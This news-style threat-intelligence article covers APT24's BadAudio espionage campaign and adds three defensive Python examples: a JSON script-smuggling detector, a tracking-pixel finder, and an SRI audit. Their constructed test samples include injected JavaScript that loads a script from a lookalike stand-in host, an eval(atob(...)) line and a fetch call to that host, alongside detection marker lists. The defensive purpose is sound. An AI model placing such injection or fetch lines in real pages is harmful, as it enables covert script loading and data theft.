Google Threat Intelligence Group (GTIG) has detailed a multi‑year cyber espionage operation attributed to the Chinese threat actor APT24 (also known as Pitty Tiger). The campaign, active for roughly three years, targets organizations in the United States and Taiwan and relies on a previously undocumented malware family dubbed BadAudio to steal sensitive intellectual property.
Target sectors and objectives of the APT24 cyber espionage campaign
According to GTIG, APT24 focuses on entities that hold high‑value technological and commercial information. Victims span government agencies, healthcare providers, construction and engineering firms, the mining sector, telecommunications providers, and non‑profit organizations.
The group’s primary objective is long‑term cyber espionage and theft of intellectual property, not opportunistic ransomware or one‑off financial fraud. The attackers seek persistent access to design documentation, R&D data, business strategies, and partner information that can provide strategic or economic advantage.
Watering‑hole and supply‑chain attacks leveraging malicious JavaScript
Watering‑hole attacks with fake software update prompts
From November 2022 to September 2025, APT24 compromised more than 20 legitimate websites across multiple domains in a classic watering‑hole attack. In such campaigns, adversaries compromise websites frequently visited by their intended targets, then silently profile and infect visitors.
The attackers injected malicious JavaScript into site code to perform Windows host fingerprinting, collecting browser and system characteristics. When a visitor matched the group’s targeting profile, the script displayed a fake “software update” pop‑up window. Clicking the prompt delivered the BadAudio malware to the victim’s machine.
JavaScript supply‑chain compromise via Taiwanese marketing provider
Beginning in July 2024, APT24 repeatedly compromised a Taiwan‑based marketing company that distributes JavaScript libraries to its clients. The attackers injected malicious code into a widely used library and registered a domain mimicking a legitimate CDN provider to blend into normal web traffic.
This supply‑chain intrusion allowed APT24 to compromise over 1,000 domains that loaded the tainted script. The technique mirrors previous large‑scale supply‑chain incidents such as SolarWinds Orion and CCleaner, where compromising a single upstream component provided reach into many downstream organizations.
Abuse of JSON files for covert telemetry collection
In a second wave of attacks between late 2024 and July 2025, the same Taiwanese provider was targeted again, but the approach evolved. APT24 embedded obfuscated JavaScript inside a modified JSON file. Once executed, this code collected visitor information and exfiltrated it as a base64‑encoded report to APT24’s command‑and‑control (C2) infrastructure, enabling stealthy reconnaissance.
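A defender reviewing content served by a third‑party provider can apply a simple heuristic to the pattern described above: a data‑only JSON document should not contain executable JavaScript constructs or long base64 blobs that decode to script. The following Python is an added example written for this article, not code from GTIG or from the page; the sample documents, field names and hostname are constructed for illustration.

```python
import base64
import json
import re

# Fragments of executable JavaScript that have no place in a data-only JSON
# document served by a marketing or analytics provider (heuristic, not exhaustive).
SCRIPT_MARKERS = ("eval(", "Function(", "document.", "window.", "<script", "fromCharCode")
# Long runs of base64 alphabet: used as a heuristic for smuggled encoded content.
BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{80,}={0,2}")


def _walk(node, path="$"):
    """Yield (json_path, string_value) for every string in a parsed JSON tree."""
    if isinstance(node, str):
        yield path, node
    elif isinstance(node, dict):
        for key, value in node.items():
            yield from _walk(value, f"{path}.{key}")
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from _walk(value, f"{path}[{index}]")


def _decodes_to_script(blob):
    """True if a base64 run decodes to text containing script-like markers."""
    try:
        text = base64.b64decode(blob, validate=True).decode("utf-8", "ignore")
    except Exception:  # bad padding or not valid base64
        return False
    return any(marker in text for marker in SCRIPT_MARKERS)


def find_suspicious_strings(raw_json):
    """Return a list of (json_path, reason) findings for a JSON document."""
    findings = []
    for path, value in _walk(json.loads(raw_json)):
        hits = [marker for marker in SCRIPT_MARKERS if marker in value]
        if hits:
            findings.append((path, "script-like content: " + ", ".join(hits)))
        for run in BASE64_RUN.findall(value):
            if _decodes_to_script(run):
                findings.append((path, "base64 blob decodes to script-like content"))
    return findings


# Constructed sample inputs (not real APT24 artifacts).
BENIGN_JSON = json.dumps({"site": "shop", "version": "3.2.1", "features": ["banner", "popup"]})
_SMUGGLED = base64.b64encode(
    b"document.write('<script src=\"https://cdn-lookalike.example/collect.js\"></script>');"
).decode()
TAMPERED_JSON = json.dumps({
    "site": "shop",
    "version": "3.2.1",
    "features": ["banner", "popup"],
    "telemetry": {"init": "eval(atob(localStorage.t))", "blob": _SMUGGLED},
})

if __name__ == "__main__":
    for name, doc in (("benign", BENIGN_JSON), ("tampered", TAMPERED_JSON)):
        print(name, find_suspicious_strings(doc))
```

Run this against a mirrored copy of each JSON resource a page loads from an external provider; any finding is a signal to diff the resource against a known‑good copy and to contact the provider.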
Phishing, tracking pixels, and abuse of cloud services
In parallel with the web‑based intrusions, APT24 has run targeted phishing campaigns since August 2024. Messages were crafted to appear as if sent from animal protection and welfare organizations, a socially neutral theme designed to lower suspicion and bypass basic user scrutiny.
The emails contained hidden tracking pixels that informed the attackers when recipients opened the messages, helping them prioritize responsive targets for further social engineering. In several cases, APT24 abused legitimate cloud services such as Google Drive and Microsoft OneDrive to stage payloads and receive data, making malicious traffic difficult to distinguish from normal business use.
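Tracking pixels of the kind described above are detectable in a mail‑security pipeline by parsing the HTML body for remote images that are rendered at one pixel or hidden by CSS. The following Python is an added example written for this article, not code from GTIG or from the page; the sample message and the hostnames in it are constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


def _px(value):
    """Parse a width/height attribute such as '1', '1px' or '200' into an int, else None."""
    if value is None:
        return None
    cleaned = value.strip().lower().removesuffix("px")
    return int(cleaned) if cleaned.isdigit() else None


class _PixelHunter(HTMLParser):
    """Collects <img> tags that fetch a remote URL while being tiny or hidden."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag != "img":
            return
        a = {k: (v or "") for k, v in attrs}
        src = a.get("src", "")
        if urlparse(src).scheme not in ("http", "https"):
            return  # inline (cid:/data:) images cannot report an open to a remote host
        width, height = _px(a.get("width")), _px(a.get("height"))
        style = a.get("style", "").replace(" ", "").lower()
        tiny = (width is not None and width <= 1) or (height is not None and height <= 1)
        hidden = "display:none" in style or "visibility:hidden" in style
        if tiny or hidden:
            self.hits.append({
                "src": src,
                "host": urlparse(src).netloc,
                "reason": "tiny" if tiny else "hidden",
            })


def find_tracking_pixels(html):
    """Return a list of suspected tracking-pixel images found in an HTML mail body."""
    parser = _PixelHunter()
    parser.feed(html)
    return parser.hits


# Constructed sample message (hostnames and identifiers are placeholders).
SAMPLE_EMAIL_HTML = """
<html><body>
  <img src="https://charity.example/logo.png" width="200" height="60" alt="logo">
  <p>Thank you for supporting animal welfare.</p>
  <img src="https://track.example/open?id=CONSTRUCTED-ID" width="1" height="1">
  <img src="https://beacon.example/o.gif" style="display: none">
</body></html>
"""

if __name__ == "__main__":
    for hit in find_tracking_pixels(SAMPLE_EMAIL_HTML):
        print(hit["reason"], hit["host"], hit["src"])
```

The hosts collected here feed naturally into a block list or a proxy rule that rewrites remote images, and a spike of such pixels from one sender domain is a useful trigger for closer review of that sender's other messages.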
Inside BadAudio: obfuscated loader using DLL sideloading
DLL search order hijacking and sideloading techniques
BadAudio is described as a heavily obfuscated malware loader designed to quietly deploy additional malicious components. It relies on DLL search order hijacking and DLL sideloading: the attackers place a malicious DLL in a directory where a trusted Windows application will load it first, following the operating system’s normal library search order.
This technique lets the payload run under the guise of a legitimate process, bypassing some traditional defenses and reducing the likelihood of detection by signature‑based tools.
Modular architecture, encryption, and low detection rates
BadAudio’s code is split into multiple discrete blocks orchestrated by a central control routine. This modular architecture complicates both automated sandbox analysis and manual reverse‑engineering, as behavior is scattered and only assembled at runtime.
Once executed, BadAudio gathers basic host data—hostname, username, and system architecture—encrypts it using a hard‑coded AES key, and transmits it to the C2 server. The response contains an encrypted secondary payload that is decrypted and run in memory via DLL sideloading, minimizing disk artifacts and forensic traces.
GTIG reports that of eight known BadAudio samples, only two are detected by more than 25 antivirus engines on VirusTotal. Samples dated 7 December 2022 are flagged by no more than five security products, underscoring the effectiveness of the obfuscation and the tool’s focused, low‑volume deployment.
Implications for defenders and recommended security measures
The APT24 operation illustrates a mature, multi‑layered approach to cyber espionage, combining watering‑hole compromises, JavaScript supply‑chain attacks, tailored phishing, and stealthy loaders. Industry reports such as the Verizon Data Breach Investigations Report (DBIR) and Mandiant M‑Trends have consistently highlighted this trend toward more covert and complex APT tradecraft.
Organizations in sensitive sectors should move from point solutions to a comprehensive cybersecurity strategy that includes rigorous supplier risk management, continuous web asset monitoring, robust email security, and advanced endpoint visibility.
Practical measures include: enforcing integrity checks (such as SRI and file hashing) for third‑party JavaScript; auditing and restricting DLL sideloading through application configuration and allow‑listing; deploying EDR platforms and regular threat hunting focused on obfuscated code and anomalous network connections; strengthening employee training against highly tailored phishing; and enforcing multi‑factor authentication on critical systems.
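The first of these measures, integrity checks for third‑party JavaScript, can be made concrete in two steps: compute and pin a Subresource Integrity (SRI) value for each external script, and audit your own pages for script tags that load from a foreign host without an integrity attribute. The following Python is an added example written for this article, not code from GTIG or from the page; the script bodies, hostnames and HTML page are constructed.

```python
import base64
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse


def sri_hash(body: bytes, algo: str = "sha384") -> str:
    """Compute the SRI integrity value ('sha384-<base64 digest>') for a script body."""
    digest = hashlib.new(algo, body).digest()
    return f"{algo}-{base64.b64encode(digest).decode()}"


def verify_sri(body: bytes, integrity: str) -> bool:
    """True if the body matches any hash in a space-separated integrity attribute."""
    for token in integrity.split():
        algo, _, rest = token.partition("-")
        expected = rest.split("?", 1)[0]  # drop optional '?options' suffix
        if algo in ("sha256", "sha384", "sha512") and sri_hash(body, algo) == f"{algo}-{expected}":
            return True
    return False


class _ScriptAudit(HTMLParser):
    """Collects external <script src> URLs that carry no integrity attribute."""

    def __init__(self, own_hosts):
        super().__init__()
        self.own_hosts = own_hosts
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = dict(attrs)
        src = a.get("src")
        if not src:
            return
        host = urlparse(src).netloc  # empty for same-origin relative paths
        if host and host not in self.own_hosts and not a.get("integrity"):
            self.findings.append(src)


def scripts_without_sri(html: str, own_hosts=()):
    """Return the external script URLs in a page that are loaded without SRI."""
    parser = _ScriptAudit(set(own_hosts))
    parser.feed(html)
    return parser.findings


# Constructed samples: a pinned library body, a tampered copy, and a page to audit.
LIB_BODY = b"console.log('lib v1');"
LIB_INTEGRITY = sri_hash(LIB_BODY)
TAMPERED_BODY = LIB_BODY + b"fetch('https://cdn-lookalike.example/c');"
SAMPLE_PAGE = f"""
<html><head>
  <script src="/static/app.js"></script>
  <script src="https://cdn.example/lib.js" integrity="{LIB_INTEGRITY}" crossorigin="anonymous"></script>
  <script src="https://marketing-provider.example/tag.js"></script>
</head><body></body></html>
"""

if __name__ == "__main__":
    print("pinned:", LIB_INTEGRITY)
    print("original verifies:", verify_sri(LIB_BODY, LIB_INTEGRITY))
    print("tampered verifies:", verify_sri(TAMPERED_BODY, LIB_INTEGRITY))
    print("scripts without SRI:", scripts_without_sri(SAMPLE_PAGE, own_hosts={"www.example"}))
```

SRI only protects resources whose content is fixed at the time the tag is written, so a provider that ships frequently changing scripts must either publish versioned, immutable URLs that you can pin, or be treated as an unpinned dependency and monitored by re‑fetching and diffing the resource on a schedule.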
The APT24 BadAudio campaign demonstrates how state‑aligned actors blend technical sophistication with social engineering and supply‑chain compromise to exfiltrate high‑value intellectual property. Organizations operating in innovation‑driven or geopolitically exposed markets should regularly review their threat models, update defenses, and invest in proactive monitoring to detect similar operations before they escalate into major data loss incidents.